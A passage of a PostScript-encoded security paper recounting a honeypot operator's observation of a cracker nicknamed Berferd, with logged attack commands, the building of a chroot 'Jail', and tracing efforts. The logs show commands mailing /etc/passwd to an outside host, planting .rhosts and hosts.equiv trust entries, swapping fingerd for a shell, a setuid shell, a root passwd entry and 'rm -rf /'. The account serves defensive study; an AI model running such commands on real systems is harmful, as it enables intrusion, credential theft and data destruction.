396 y(23:08)114 b(echo)24 b("embezzl)q(e.s)q(ta)q(nfo)q(rd)q(.e)q(du)i
(adrian">>)q(/tm)q(p/)q(.rh)q(os)q(ts)0 492 y Ff(Apparently)11
b(he)h(was)g(trying)e(to)h Fe(rlogin)f Ff(to)h(our)h(gateway)m(.)20
b(This)12 b(requires)f(appropriate)g(entries)g(in)g(some)i(local)e(\256les.)
20 b(At)12 b(the)f(time)0 542 y(we)g(did)e(not)h(detect)g(attempted)g
Fe(rlogin)f Ff(commands.)150 627 y Fb(23:09)114 b(Attempt)25
b(to)f(login)g(to)f(inet)i(with)46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)
q(d.)q(EDU)150 666 y(23:10)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)
46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)q(d.)q(EDU)150
706 y(23:14)114 b(mail)24 b(adrian@e)q(mbe)q(zz)q(le.)q(st)q(an)q(for)q(d.)q
(edu)i(<)d(/etc/inet)q(d.)q(co)q(nf)374 745 y(ps)g(-aux|mai)q(l)j(adrian@emb)
q(ez)q(zle)q(.s)q(tan)q(fo)q(rd)q(.ed)q(u)0 840 y Ff(Following)9
b(the)j(presumed)g(failed)f(attempts)g(to)g Fe(rlogin)p Ff(,)g(Berferd)h
(wanted)f(our)g Fc(inetd.conf)g Ff(\256le)h(to)f(discover)g(which)g(services)
0 890 y(we)g(did)e(provide.)14 b(I)d(didn')o(t)d(want)i(him)g(to)g(see)h(the)
g(real)f(one,)h(and)f(it)g(was)h(too)e(much)i(trouble)e(to)g(make)j(one.)83
993 y Fg(Decision)e(7)21 b Fe(The)9 b(gateway)e(computer)i(is)f(not)f
(deterministic.)14 b(\(W)l(e've)9 b(always)f(suspected)h(that)e(of)h
(computers)g(anyway)n(.\))150 1085 y Fb(23:28)114 b(echo)24
b("36.92.0)q(.20)q(5)115 b(embezzle)q(.st)q(an)q(fo)q(rd.)q(ed)q(u")26
b(>>)d(/etc/host)q(s)374 1124 y(echo)h("embezzl)q(e.s)q(ta)q(nfo)q(rd)q(.e)q
(du)48 b(adrian")26 b(>>)d(/tmp/.rho)q(sts)374 1164 y(ps)g(-aux|mai)q(l)j
(adrian@emb)q(ez)q(zle)q(.s)q(tan)q(fo)q(rd)q(.ed)q(u)374 1203
y(mail)e(adrian@e)q(mbe)q(zz)q(le.)q(st)q(an)q(for)q(d.)q(edu)i(<)d
(/etc/inet)q(d.)q(co)q(nf)0 1305 y Ff(I)13 b(didn')o(t)f(want)i(him)f(to)g
(see)i(a)f Fe(ps)f Ff(output)f(either)n(.)24 b(Fortunately)m(,)14
b(his)f(Berkeley)g Fe(ps)h Ff(command)g(switches)g(wouldn')o(t)e(work)h(on)g
(our)0 1355 y(System)e(V)f(machine.)0 1423 y(At)h(this)f(point)g(I)h(called)g
(CER)n(T)m(.)g(This)g(was)h(an)g(extended)f(attack,)h(and)f(there)g(ought)f
(to)g(be)i(someone)g(at)f(Stanford)f(tracing)h(the)g(call.)0
1473 y(I)g(didn')o(t)f(realize)h(it)g(would)f(take)h(weeks)h(to)f(get)f(a)i
(trace.)19 b(I)11 b(wasn')o(t)g(sure)g(exactly)g(what)g(CER)n(T)g(does)g(in)g
(these)g(circumstances.)19 b(Do)0 1522 y(they)12 b(call)h(The)h(Feds?)23
b(Roust)11 b(a)j(prosecutor?)22 b(Activate)12 b(an)h(international)e(phone)h
(tap)h(network?)22 b(What)13 b(they)f(did)g(was)h(log)f(and)0
1572 y(monitor)c(everything,)h(and)h(try)g(to)f(get)h(me)g(in)g(touch)f(with)
g(a)h(system)h(manager)f(at)g(Stanford.)15 b(They)10 b(seem)h(to)f(have)g(a)g
(very)g(good)f(list)0 1622 y(of)h(contacts.)0 1690 y(By)g(this)f(time)i(I)f
(had)g(numerous)g(windows)g(on)g(my)g(terminal)g(running)e
Fe(tail)h(-f)h Ff(on)g(various)g(log)f(\256les.)16 b(I)10 b(could)g(monitor)f
(Riyadh)g(and)0 1740 y(all)h(those)g(demons)g(at)h(the)f(same)i(time.)j(The)c
(action)e(resumed)i(with)f(FTP:)150 1825 y Fb(Jan)24 b(20)f(23:36:48)j(inet)e
(ftpd[14437)q(]:)i(<---)e(220)g(inet)g(FTP)g(server)778 1864
y(\(Version)h(4.265)g(Fri)f(Feb)f(2)g(13:39:38)j(EST)d(1990\))i(ready.)150
1904 y(Jan)f(20)f(23:36:55)j(inet)e(ftpd[14437)q(]:)i(------->)g(user)e
(bfrd\303M)150 1943 y(Jan)g(20)f(23:36:55)j(inet)e(ftpd[14437)q(]:)i(<---)e
(331)g(Password)i(required)f(for)f(bfrd.)150 1982 y(Jan)g(20)f(23:37:06)j
(inet)e(ftpd[14437)q(]:)i(------->)g(pass\303M)150 2022 y(Jan)e(20)f
(23:37:06)j(inet)e(ftpd[14437)q(]:)i(<---)e(500)g('PASS':)h(command)h(not)d
(understo)q(od.)150 2061 y(Jan)h(20)f(23:37:13)j(inet)e(ftpd[14437)q(]:)i
(------->)g(pass\303M)150 2101 y(Jan)e(20)f(23:37:13)j(inet)e(ftpd[14437)q
(]:)i(<---)e(500)g('PASS':)h(command)h(not)d(understo)q(od.)150
2140 y(Jan)h(20)f(23:37:24)j(inet)e(ftpd[14437)q(]:)i(------->)g(HELP\303M)
150 2180 y(Jan)e(20)f(23:37:24)j(inet)e(ftpd[14437)q(]:)i(<---)e(214-)g(The)g
(following)i(commands)g(are)778 2219 y(recognized)g(\(*)d(=>'s)i(unimplemen)q
(te)q(d\).)150 2258 y(Jan)f(20)f(23:37:24)j(inet)e(ftpd[14437)q(]:)i(<---)e
(214)g(Direct)h(comments)h(to)d(ftp-bugs@)q(ine)q(t.)150 2298
y(Jan)h(20)f(23:37:31)j(inet)e(ftpd[14437)q(]:)i(------->)g(QUIT\303M)150
2337 y(Jan)e(20)f(23:37:31)j(inet)e(ftpd[14437)q(]:)i(<---)e(221)g(Goodbye.)
150 2377 y(Jan)g(20)f(23:37:31)j(inet)e(ftpd[14437)q(]:)i(Logout,)f(status)g
(0)150 2416 y(Jan)f(20)f(23:37:31)j(inet)e(inetd[116])q(:)i(exit)e(14437)150
2456 y(Jan)g(20)f(23:37:41)j(inet)e(inetd[116])q(:)i(finger)47
b(request)25 b(from)47 b(36.92.0.2)q(05)h(pid)24 b(14454)150
2495 y(Jan)g(20)f(23:37:41)j(inet)e(inetd[116])q(:)i(exit)e(14454)150
2574 y(23:38)114 b(finger)25 b(attempt)g(on)f(berferd)150 2613
y(23:48)114 b(echo)24 b("36.92.0)q(.20)q(5)115 b(embezzle)q(.st)q(an)q(fo)q
(rd.)q(ed)q(u")26 b(>>)d(/etc/host)q(s.)q(eq)q(uiv)150 2653
y(23:53)114 b(mv)23 b(/usr/etc)q(/f)q(ing)q(er)q(d)i(/usr/etc)q(/f)q(ing)q
(er)q(d.)q(b)374 2692 y(cp)e(/bin/sh)j(/usr/etc/f)q(in)q(ge)q(rd)p
eop
%%Page: 7 7
bop 0 42 a Ff(Decision)10 b(4)g(dictates)h(that)f(the)g(last)g(line)g(must)g
(fail.)16 b(Therefore,)11 b(he)g(just)f(broke)g(the)g Fe(\256nger)h
Ff(service)g(on)f(my)h(simulated)f(machine.)16 b(I)0 91 y(turned)9
b(of)o(f)h(the)h(real)f(service.)150 180 y Fb(23:57)114 b(Attempt)25
b(to)f(login)g(to)f(inet)i(with)46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)
q(d.)q(EDU)150 219 y(23:58)114 b(cp)23 b(/bin/csh)j(/usr/etc/)q(fi)q(ng)q
(erd)0 318 y Fe(Csh)10 b Ff(wasn')o(t)g(in)g Fe(/bin)f Ff(either)n(,)i(so)f
(that)f(command)j(\252failed.\272)150 414 y Fb(00:07)114 b(cp)23
b(/usr/etc)q(/f)q(ing)q(er)q(d.b)j(/usr/etc)q(/fi)q(ng)q(er)q(d)0
521 y Ff(OK.)11 b Fe(Finger)n(d)f Ff(worked)g(again.)15 b(Nice)c(of)f
(Berferd)g(to)g(clean)h(up.)150 609 y Fb(00:14)114 b(passwd)25
b(bfrt)374 649 y(bfrt)374 688 y(bfrt)0 787 y Ff(Now)12 b(he)g(was)g(trying)e
(to)i(change)g(the)g(password.)20 b(This)11 b(would)g(never)h(work,)g(since)h
Fe(passwd)e Ff(reads)h(its)f(input)g(from)g Fc(/dev/tty)p Ff(,)0
837 y(not)e(the)i(shell)e(script)h(that)g Fe(sendmail)f Ff(would)g(create.)
150 925 y Fb(00:16)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46
b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)q(d.)q(EDU)150 965
y(00:17)114 b(echo)24 b("/bin/sh)q(")h(>)e(/tmp/She)q(ll)374
1004 y(chmod)i(755)e(/tmp/she)q(ll)374 1044 y(chmod)i(755)e(/tmp/She)q(ll)150
1083 y(00:19)114 b(chmod)25 b(4755)f(/tmp/shell)150 1123 y(00:19)114
b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46 b(bfrd)h(from)f(embezzle.)q
(St)q(anf)q(or)q(d.)q(EDU)150 1162 y(00:19)114 b(Attempt)25
b(to)f(login)g(to)f(inet)i(with)46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)
q(d.)q(EDU)150 1201 y(00:21)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)
46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)q(d.)q(EDU)150
1241 y(00:21)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46
b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)q(d.)q(EDU)0 1340
y Ff(At)10 b(this)g(point)f(I)h(was)h(tired.)16 b(CNN)10 b(had)g(nothing)f
(interesting)g(to)h(report)f(from)i(the)f(Middle)g(East.)16
b(I)11 b(wanted)f(to)g(continue)g(watching)0 1389 y(Berferd)i(in)f(the)g
(morning,)h(but)e(I)i(had)g(to)f(shut)g(down)g(my)h(simulated)f(machine)i
(until)d(then.)19 b(I)11 b(was)i(wondering)d(how)h(much)i(ef)o(fort)0
1439 y(this)d(was)i(worth.)k(Clif)o(f)9 b(Stoll)h(had)h(done)g(a)g(\256ne)g
(job)f(before[2])h(and)g(it)f(wasn')o(t)h(very)g(interesting)e(doing)h(it)g
(over)g(again.)18 b(It)10 b(was)i(fun)0 1489 y(to)g(lead)h(this)f(guy)g(on,)h
(but)f(what')n(s)g(the)g(goal?)23 b(I)12 b(did)g(want)g(to)g(keep)i(him)e
(busy)g(so)h(that)f(someone)h(at)g(Stanford)f(could)g(trace)h(him,)0
1539 y(but)c(they)h(wouldn')o(t)f(be)i(in)e(until)g(the)h(morning.)k(I)c
(could)g(just)f(shut)h(down)g(the)g(gateway)h(overnight:)h(it)e(is)g(a)h
(research)h(machine,)f(not)0 1589 y(production.)20 b(I)13 b(shut)f(down)g
(the)g(gateway)h(after)g(sending)f(out)g(a)h(complaint)f(about)g(possible)g
(disk)g(errors.)22 b(I)13 b(made)g(sure)g(Berferd)0 1639 y(was)e(sitting)d
(in)i(one)g(of)g(those)g Fe(sleep)p Ff(s)h(in)f(the)g(login)e(when)j(the)f
(message)i(went)e(out.)0 1706 y(I)h(decided)h(I)f(would)f(like)h(to)f(have)i
(Berferd)f(spend)g(more)h(time)f(trying)f(to)g(get)i(in)e(than)h(I)g(spent)g
(leading)g(him)g(on.)18 b(\(In)10 b(the)h(long)g(run)0 1756
y(he)g(won)g(that)g(battle.\))17 b(After)11 b(half)f(an)i(hour)e(I)h
(concluded)g(that)g(this)f(creep)i(wasn')o(t)f(worth)f(holding)g(up)g(a)i
(night')n(s)d(worth)h(of)h(mail.)18 b(I)0 1806 y(brought)9
b(the)h(machine)h(back)f(up,)h(and)f(went)g(to)g(sleep.)0 1874
y(Berferd)j(returned)f(an)h(hour)f(later)n(.)22 b(Of)13 b(course,)h(the)e
(magic)i(went)e(away)i(when)e(I)h(went)g(to)f(bed,)h(but)f(that)g(didn')o(t)g
(seem)i(to)e(bother)0 1923 y(him.)j(He)10 b(was)h(hooked.)j(He)c(continued)f
(his)g(attack)h(at)g(00:40.)k(The)c(logs)f(of)h(his)f(attempts)h(were)g
(tedious)f(until)f(this)h(command)h(was)0 1973 y(submitted)f(for)h
Fe(r)n(oot)g Ff(to)g(execute:)150 2062 y Fb(01:55)114 b(rm)23
b(-rf)h(/&)0 2160 y Fg(WHOA!)11 b Ff(Now)g(it)f(was)h(personal!)17
b(Obviously)9 b(the)h(machine')n(s)i(state)f(was)h(confusing)d(him,)i(and)g
(he)h(wanted)e(to)h(cover)g(his)f(tracks.)0 2210 y(Some)15
b(crackers)h(defend)f(their)f(work,)h(stating)e(that)h(they)g(don')o(t)g(do)g
(any)h(real)g(damage.)29 b(Our)14 b(cracker)i(tried)e(this)g(with)f(us,)j
(and)0 2260 y(succeeded)c(with)d(this)g(command)j(on)d(other)h(systems.)0
2328 y(He)h(worked)f(for)f(a)i(few)g(more)g(minutes,)f(and)g(gave)h(up)f
(until)e(morning.)150 2416 y Fb(07:12)114 b(Attempt)25 b(to)f(login)g(to)f
(inet)i(with)46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)q(d.)q(EDU)150
2456 y(07:14)114 b(rm)23 b(-rf)h(/&)150 2495 y(07:17)114 b(finger)25
b(attempt)g(on)f(berferd)150 2535 y(07:19)114 b(/bin/rm)25
b(-rf)f(/&)374 2574 y(/bin/rm)h(-rf)f(/&)150 2613 y(07:23)114
b(/bin/rm)25 b(-rf)f(/&)150 2653 y(07:25)114 b(Attempt)25 b(to)f(login)g(to)f
(inet)i(with)46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)q(d.)q(EDU)150
2692 y(09:41)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46
b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)q(d.)q(EDU)p eop
%%Page: 8 8
bop 0 42 a Fg(4.)21 b(The)10 b(day)g(after)83 137 y Ff(It)h(was)i(time)f(to)f
(catch)i(up)f(with)e(all)i(the)g(commands)h(he)f(had)g(tried)f(after)h(I)g
(went)g(to)f(sleep,)j(including)c(those)h(three)h(attempts)0
187 y(to)g(erase)h(all)f(our)f(\256les.)21 b(T)m(o)13 b(simulate)f(the)g
(nasty)f Fe(rm)i Ff(command,)g(I)f(took)f(the)h(machine)h(down)f(for)f(a)i
(little)d(while,)j(cleaned)g(up)e(the)0 237 y(simulated)e(password)h(\256le,)
g(and)f(left)g(a)i(message)g(from)e(our)g(hapless)h(system)g(administrator)e
(in)h Fc(/etc/motd)g Ff(about)g(a)h(disk)f(crash.)0 287 y(My)h(log)f(showed)i
(the)f(rest)g(of)g(the)g(queued)g(commands:)150 377 y Fb(mail)24
b(adrian@em)q(be)q(zzl)q(e.)q(st)q(anf)q(or)q(d.e)q(du)i(<)d(/etc/pass)q(wd)
150 416 y(mail)h(adrian@em)q(be)q(zzl)q(e.)q(st)q(anf)q(or)q(d.e)q(du)i(<)d
(/etc/host)q(s)150 456 y(mail)h(adrian@em)q(be)q(zzl)q(e.)q(st)q(anf)q(or)q
(d.e)q(du)i(<)d(/etc/inet)q(d.)q(con)q(f)150 495 y(ps)g(-aux|mai)q(l)i
(adrian@e)q(mb)q(ezz)q(le)q(.st)q(an)q(fo)q(rd.)q(ed)q(u)150
535 y(ps)e(-aux|mai)q(l)i(adrian@e)q(mb)q(ezz)q(le)q(.st)q(an)q(fo)q(rd.)q
(ed)q(u)150 574 y(mail)f(adrian@em)q(be)q(zzl)q(e.)q(st)q(anf)q(or)q(d.e)q
(du)i(<)d(/etc/inet)q(d.)q(con)q(f)0 675 y Ff(I)14 b(mailed)g(him)g(the)g
(four)f(simulated)h(\256les,)i(including)c(the)i(huge)g(and)g(useless)h
Fc(/etc/hosts)e Ff(\256le.)27 b(I)14 b(even)g(mailed)h(him)e(error)0
725 y(messages)f(for)e(the)g(two)g Fe(ps)g Ff(commands)h(in)f(direct)g
(violation)e(of)i(the)g(no-errors)f(Decision)h(6.)0 793 y(In)g(the)g
(afternoon)g(he)g(was)h(still)e(there,)h(mistyping)f(away:)150
883 y Fb(13:41)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46
b(bfrd)h(from)f(decaf.Sta)q(nf)q(ord)q(.E)q(DU)150 923 y(13:41)114
b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46 b(bfrd)h(from)f(decaf.Sta)q
(nf)q(ord)q(.E)q(DU)150 962 y(14:05)114 b(Attempt)25 b(to)f(login)g(to)f
(inet)i(with)46 b(bfrd)h(from)f(decaf.Sta)q(nf)q(ord)q(.E)q(DU)150
1001 y(16:07)114 b(echo)24 b("bffr)h(::7007:0::)q(/:)q(/v)q(/bi)q(n/)q(sh")h
(>>)e(/etc/o\303Hpa)q(ss)q(wd)150 1041 y(16:08)114 b(echo)24
b("bffr)h(::7007:0::)q(/:)q(/v)q(/bi)q(n/)q(sh")h(>>)e(/etc/passw)q(d)0
1142 y Ff(He)15 b(worked)e(for)h(another)g(hour)f(that)h(afternoon,)h(and)f
(from)g(time-to-time)f(over)h(the)g(next)f(week)i(or)f(so.)27
b(I)14 b(went)g(to)g(the)g(Dallas)0 1192 y(\252CNN\272)e(Usenix,)g(where)g
(his)g(commands)g(were)h(simulated)e(from)g(the)h(terminal)f(room)g(about)g
(twice)h(a)g(day)m(.)20 b(This)11 b(response)h(time)0 1241
y(was)f(stretching)e(credibility)m(,)g(but)g(his)h(faith)f(seemed)j
(un\257agging.)0 1374 y Fg(5.)21 b(The)10 b(Jail)83 1470 y
Ff(I)h(never)g(intended)e(to)h(use)h(these)h(tools)d(to)h(simulate)h(a)g
(system)g(in)f(real-time.)16 b(I)11 b(wanted)g(to)f(watch)g(the)h(cracker)r
(')n(s)g(keystrokes,)0 1520 y(to)e(trace)i(him,)f(learn)g(his)f(techniques,)h
(and)g(warn)g(his)g(victims.)k(The)d(best)f(solution)d(was)k(to)e(lure)h(him)
f(to)h(a)g(sacri\256cial)g(machine)h(and)0 1569 y(tap)h(the)g(connection.)21
b(The)12 b(Ethernet)g(is)g(easy)i(to)d(tap,)i(and)f(modi\256ed)g
Fe(tcpdump)g Ff(software)g(can)h(separate)g(and)f(store)g(the)h(sessions.)0
1619 y(But)d(I)h(didn')o(t)f(have)h(a)h(spare)g(machine)f(handy)m(,)h(so)f(I)
g(took)f(the)h(software)g(route.)17 b(\(Steve)11 b(Bellovin)f(did)g
(construct)g(such)h(a)h(machine.)0 1669 y(W)m(e)f(never)f(managed)h(to)f
(lure)g(anyone)g(interesting)f(to)h(it.\))0 1737 y(I)g(consulted)f(the)g
(local)h(gurus)f(about)g(the)g(security)h(of)f(a)h Fe(chr)n(oot)g
Ff(environment.)k(Their)c(conclusion:)j(it)c(is)g(not)g(perfectly)h(secure,)h
(but)0 1787 y(if)d(compilers)h(and)g(certain)f(programs)h(are)h(missing,)e
(it)g(is)h(very)g(dif)o(\256cult)e(to)h(escape.)17 b(It)8 b(is)h(also)f(not)g
(undetectable,)i(but)e(I)g(\256gured)h(that)0 1836 y(Berferd)i(was)g(always)g
(in)f(a)h(hurry)m(,)g(and)f(probably)g(wouldn')o(t)f(notice.)16
b(W)m(e)11 b(constructed)f(such)h(a)g Fe(chr)n(oot)f Ff(\252Jail\272)i(\(or)e
(\252roach)h(motel\272\))0 1886 y(and)g(rigged)e(up)i(logged)e(connections)h
(to)g(it)g(through)f(our)h(\256rewall)h(machine)g(\(see)g(Figure)g(1\).)k
(Accounts)c Fe(berfer)n(d)g Ff(and)g Fe(guest)f Ff(were)0 1936
y(connected)i(to)g(the)f(Jail)h(through)e(this)h(arrangement.)21
b(T)m(wo)13 b(logs)e(were)i(kept)e(per)h(session,)h(one)f(each)h(for)f(input)
e(and)i(output.)18 b(The)0 1986 y(logs)10 b(were)h(labeled)f(with)f(starting)
g(and)h(ending)g(times.)0 2053 y(The)j(Jail)f(was)i(hard)e(to)g(set)h(up.)21
b(W)m(e)13 b(had)g(to)f(get)g(the)g(access)j(times)e(in)e Fc(/dev)i
Ff(right)e(and)h(update)h Fc(utmp)f Ff(for)g(Jail)g(users.)23
b(Several)0 2103 y(raw)13 b(disk)f(\256les)i(were)f(too)f(dangerous)h(to)f
(leave)i(around.)23 b(W)m(e)13 b(removed)g Fe(ps)p Ff(,)h Fe(who)p
Ff(,)f Fe(w)p Ff(,)h Fe(netstat)p Ff(,)f(and)g(other)f(revealing)h(programs.)
0 2153 y(The)e(\252)p Fe(login)p Ff(\272)g(shell)f(script)g(had)h(to)f
(simulate)h Fe(login)e Ff(in)h(several)i(ways)f(\(see)h(Figure)e(2.\))17
b(Diana)11 b(D'Angelo)f(set)h(up)f(a)h(believable)g(\256le)0
2203 y(system)g(\(this)e(is)h Fe(very)i Ff(good)d(system)i(administration)d
(practice\))j(and)f(loaded)g(a)h(variety)e(of)h(silly)f(and)i(tempting)e
(\256les.)0 2271 y(A)k(little)e(later)h(Berferd)h(discovered)f(the)h(Jail)f
(and)h(rattled)f(around)g(in)g(it.)21 b(He)13 b(looked)f(for)g(a)i(number)e
(of)h(programs)f(that)g(we)h(later)0 2320 y(learned)f(contained)f(his)h
(favorite)e(security)i(holes.)19 b(T)m(o)12 b(us)g(the)f(Jail)h(was)g(not)f
(very)h(convincing,)f(but)g(Berferd)g(seemed)j(to)d(shrug)g(it)0
2370 y(of)o(f)f(as)h(part)f(of)g(the)g(strangeness)h(of)f(our)f(gateway)m(.)0
2503 y Fg(6.)21 b(T)m(racing)10 b(Berferd)83 2599 y Ff(Berferd)g(spent)h(a)g
(lot)e(of)h(time)h(in)f(our)g(Jail.)15 b(I)c(spent)f(a)h(lot)e(of)i(time)f
(talking)f(to)h(Stephen)g(Hansen)h(at)g(Stanford.)k(Stephen)10
b(spent)0 2648 y(a)g(lot)e(of)h(time)h(trying)d(to)i(get)g(a)h(trace.)16
b(Berferd)9 b(was)h(attacking)f(us)g(through)f(one)h(of)g(several)h(machines)
g(at)g(Stanford.)k(He)c(connected)p eop
%%Page: 9 9
bop 0 1020 a @beginspecial -40 @hoffset @setspecial
%%BeginDocument: jail.eps
/CanvasDict where not{/CanvasDict 250 dict def}{pop}ifelse
CanvasDict begin
systemdict/setpacking known{/origpack currentpacking def true setpacking}if
/bdf{bind def}bind def
/xdf{exch bind def}bdf
/min{2 copy gt{exch}if pop}bdf
/edf{exch def}bdf
/max{2 copy lt{exch}if pop}bdf
/cvmtx matrix def
/tpmx matrix def
/currot 0 def
/rotmtx matrix def
/origmtx matrix def
/cvangle{360 exch sub 90 add 360 mod}bdf
/setrot{/currot edf rotmtx currentmatrix pop 2 copy translate currot rotate neg exch neg exch translate}bdf
/endrot{rotmtx setmatrix}bdf
/i systemdict/image get def/T true def/F false def/dbg F def
/ncolors 0 def/st0 ()def/st1 ()def/proc0 {}def
/penh 1 def/penv 1 def/penv2 0 def/penh2 0 def/samplesize 0 def/width 0 def/height 0 def
/setcmykcolor where not{/setcmykcolor{/b edf 3{b add 1.0 exch sub 0.0 max 1.0 min 3 1 roll}repeat systemdict begin setrgbcolor end}bdf}{pop}ifelse
/doeoclip{closepath{eoclip}stopped{currentflat dup 2 mul setflat eoclip setflat}if}bdf
/SpaceExtra 0 def/LetterSpace 0 def/StringLength 0 def/NumSpaces 0 def/JustOffset 0 def
/f0/fill load def
/s0{1 setlinewidth cvmtx currentmatrix pop penh penv scale stroke cvmtx setmatrix}bdf
/f1{_bp _fp impat}def
/s1{cvmtx currentmatrix pop 1 setlinewidth penh penv scale
{strokepath}stopped{currentflat dup 2 mul setflat strokepath setflat}if 
_bp
cvmtx setmatrix _fp impat}def
/filltype 0 def
/stroketype 0 def
/f{filltype 0 eq{f0}{f1}ifelse}bdf
/s{stroketype 0 eq{s0}{s1}ifelse}bdf
/_fp{}def
/_bp{}def
/_fg 1 def
/_pg 0 def
/_bkg 1 def
/_frg 0 def
/_frgb 3 array def
/_frrgb [0 0 0] def
/_fcmyk 4 array def
/_frcmyk [0 0 0 1] def
/_prgb 3 array def
/_pcmyk 4 array def
/_bkrgb [1 1 1] def
/_bkcmyk [0 0 0 0] def
/fg{/_fg exch def /filltype 0 def/fills{_fg setgray}def}def
/frgb{_frgb astore pop /filltype 0 def/fills{_frgb aload pop setrgbcolor}def}def
/fcmyk{_fcmyk astore pop /filltype 0 def/fills{_fcmyk aload pop setcmykcolor}def}def
/pg{/_pg exch def /stroketype 0 def/pens{_pg setgray}def}def
/prgb{_prgb astore pop /stroketype 0 def/pens{_prgb aload pop setrgbcolor}def}def
/pcmyk{_pcmyk astore pop /stroketype 0 def/pens{_pcmyk aload pop setcmykcolor}def}def
/fpat{/fstr edf/filltype 1 def/fills{/patstr fstr def}bdf}bdf
/ppat{/sstr edf/stroketype 1 def/pens{/patstr sstr def}bdf}bdf
/bkg{ /_bkg exch def /_bp{gsave _bkg setgray fill grestore}def}def
/bkrgb{_bkrgb astore pop/_bp{gsave _bkrgb aload pop setrgbcolor fill grestore}def}def
/bkcmyk{_bkcmyk astore pop/_bp{gsave _bkcmyk aload pop setcmykcolor fill grestore}def}def
/frg{ /_frg exch def /_fp{_frg setgray}def}def
/frrgb{_frrgb astore pop/_fp{_frrgb aload pop setrgbcolor}def}def
/frcmyk{_frcmyk astore pop/_fp{_frcmyk aload pop setcmykcolor}def}def
/icomp{/ncolors edf
ncolors 1 gt{/proc0 edf
dup dup 0 get ncolors div cvi exch 0 3 -1 roll put
4 -1 roll ncolors div cvi 4 1 roll{proc0 dup/st0 edf
0 exch ncolors exch length
dup ncolors sub exch ncolors div cvi string/st1 edf
{dup 0 exch dup 1 exch
2 add{st0 exch get add}bind for
3 div ncolors 4 eq{exch dup 3 1 roll 3 add st0 exch get add 255 exch sub dup 0 lt{pop 0}if}if cvi
dup 255 gt{pop 255}if
exch ncolors div cvi exch
st1 3 1 roll put}bind for
st1}}if i}bdf
/ci
{/colorimage where
{pop false exch colorimage}
{icomp}
ifelse}bdf
/impat
{/cnt 0 def
/MySave save def
currot 0 ne{currot neg rotate}if
clip
flattenpath
pathbbox
3 -1 roll
8 div floor 8 mul dup/starty edf
sub abs 8 div ceiling 8 mul cvi/height edf
exch 8 div floor 8 mul dup/startx edf
sub abs 8 div ceiling 8 mul cvi/width edf
startx starty translate
width height scale
/height height 8 mul def
/st0 width string def
width height T [width 0 0 height neg 0 height]
{patstr
cnt 8 mod
get/st1 edf
0 1
st0 length 1 sub dup 0 le{pop 1}if
{st0 exch
st1
put}bind for/cnt cnt 1 add def
st0}bind
imagemask
MySave restore
newpath}bdf
/cm{/ncolors edf
translate
scale/height edf/colorimage where
{pop}
{ncolors mul}ifelse/width edf
/tbitstr width string def
width height 8 [width 0 0 height neg 0 height]
{currentfile tbitstr readhexstring pop}bind
ncolors
dup 3 eq {ci}{icomp}ifelse}bdf
/im{translate
scale
/height edf
/width edf
/tbitstr width 7 add 8 div cvi string def
width height 1 [width 0 0 height neg 0 height]
{currentfile tbitstr readhexstring pop}bind
i}bdf
/imk{/invFlag edf
translate
scale
/height edf
/width edf
/tbitstr width 7 add 8 div cvi string def
width height invFlag [width 0 0 height neg 0 height]
{currentfile tbitstr readhexstring pop}bind
imagemask}bdf
/BeginEPSF
{/MySave save def
/dict_count countdictstack def
/op_count count 1 sub def
userdict begin
/showpage {} def
0 setgray 0 setlinecap
1 setlinewidth 0 setlinejoin
10 setmiterlimit [] 0 setdash newpath
/languagelevel where
{pop languagelevel 1 ne{false setstrokeadjust false setoverprint}if}if
}bdf
/EndEPSF
{count op_count sub {pop}repeat
countdictstack dict_count sub {end}repeat
MySave restore}bdf
/rectpath {/cv_r edf/cv_b edf/cv_l edf/cv_t edf
cv_l cv_t moveto cv_r cv_t lineto cv_r cv_b lineto cv_l cv_b lineto cv_l cv_t lineto closepath}bdf
/setpen{/penh edf/penv edf/penv2 penv 2 div def/penh2 penh 2 div def}bdf
/dostroke{not 1 currentgray ne or {pens s}if}bdf
/dodashfill{not 1 currentgray ne or
{fills gsave f grestore gsave [] 0 setdash 
stroketype/stroketype filltype def
s/stroketype edf grestore}if}bdf
/dofill{not 1 currentgray ne or {fills f}if}bdf
/dofillsave{not 1 currentgray ne or {gsave fills f grestore}if}bdf
/doline{not 1 currentgray ne or {pens filltype/filltype stroketype def f/filltype edf}if}bdf
/spx{SpaceExtra 0 32 4 -1 roll widthshow}bdf
/lsx{SpaceExtra 0 32 LetterSpace 0 6 -1 roll awidthshow}bdf
/Rjust{stringwidth pop JustOffset exch sub /JustOffset edf}bdf
/Cjust{stringwidth pop 2 div JustOffset exch sub /JustOffset edf}bdf
/adjfit{stringwidth pop LetterSpace StringLength 1 sub mul add SpaceExtra NumSpaces mul add dup /pw edf JustOffset exch 
sub dup /wdif edf StringLength div LetterSpace add /LetterSpace edf}bdf
/ulb{currentpoint pop /underlinpt edf}bdf
/ule{gsave currentpoint newpath moveto currentfont dup /ft1 known{dup /ft1 get begin /FontMatrix get FontMatrix tpmx concatmatrix pop}
{begin FontMatrix tpmx copy pop}ifelse FontInfo begin UnderlinePosition UnderlineThickness end end dup tpmx
dtransform pop setlinewidth dup tpmx dtransform pop 0 exch rmoveto underlinpt currentpoint pop sub 0 rlineto stroke grestore}bdf
/fittext{ /SpaceExtra edf /LetterSpace edf /StringLength edf /NumSpaces edf /JustOffset edf not 1 currentgray ne or
{dup {ulb}if exch
dup adjfit
lsx {ule}if}{pop pop}ifelse}bdf
/cvRecFont{/encod edf FontDirectory 2 index known{cleartomark}{findfont dup length 1 add dict begin
{1 index/FID ne{def}{pop pop}ifelse}forall encod{/Encoding CVvec def}if
currentdict end definefont cleartomark}ifelse}bdf
/wrk1 ( ) def/wdict 16 dict def
